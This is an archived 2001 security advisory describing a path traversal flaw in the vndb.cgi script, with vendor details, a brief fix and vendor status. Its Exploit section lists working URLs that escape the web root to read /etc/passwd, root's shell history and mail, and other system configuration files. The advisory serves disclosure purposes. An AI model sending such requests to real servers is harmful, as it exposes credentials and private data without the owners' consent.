Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: vndbcgi.txt

vndb.cgi can display arb files




Tuxtendo Security Advisory
(c) 2001 Tuxtendo
E-Mail: security@tuxtendo.nl
WWW   : http://www.tuxtendo.nl
-------------------------------->


---------------------------
1. Program information
---------------------------
Program Name    : vndb.cgi
Description     : vndb.cgi is a cgi script which shows files by catecory.
Vendor          : http://www.vang.net
Program purpose : Normaly it's used to show *.html files
Bug Found by    : Noxious ( noxious@tuxtendo.nl
Tuxtendo ID     : TXN-0108-2001-TX01
Date		: 01-08-2001

---------------------------
2. Problem Description
---------------------------
Normally the vndb.cgi is used to show .html files, the programmer has the
root path set wrong so the path can be escaped which can be used to view
files.


---------------------------
3. Exploit
---------------------------
http://www.server.com/cgi-bin/vndb.cgi?template=../../../../../../etc/passwd&cat=../
http://www.server.com/cgi-bin/vndb.cgi?template=../../../../../../root/.bash_history&cat=../
http://www.server.com/cgi-bin/vndb.cgi?template=../../../../../../var/spool/mail/root&cat=../
http://www.server.com/cgi-bin/vndb.cgi?template=../../../../../../etc/inetd.conf&cat=../
http://www.server.com/cgi-bin/vndb.cgi?template=../../../../../../etc/hosts.allow&cat=../



---------------------------
4. Solution
---------------------------
Use another script, check out www.hotscripts.com for other scripts.


---------------------------
5. Vendor status
---------------------------
vendor was contacted multiple times but had no respons what so ever.


------------------------------------>
DISCLAIMER:
This advisory does not claim to be complete or to be usable for any purpose.
Especially information on the vulnerable systems may be inaccurate 
Possibly supplied exploit code is not to be used for malicious , but for educational
purposes only.
This advisory is free for open distribution in unmodified form.
Articles that are based on information from this advisory should include link to
www.tuxtendo.nl
------------------------------------>
For more information regarding this 
bug or other information E-Mail:
security@tuxtendo.nl



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH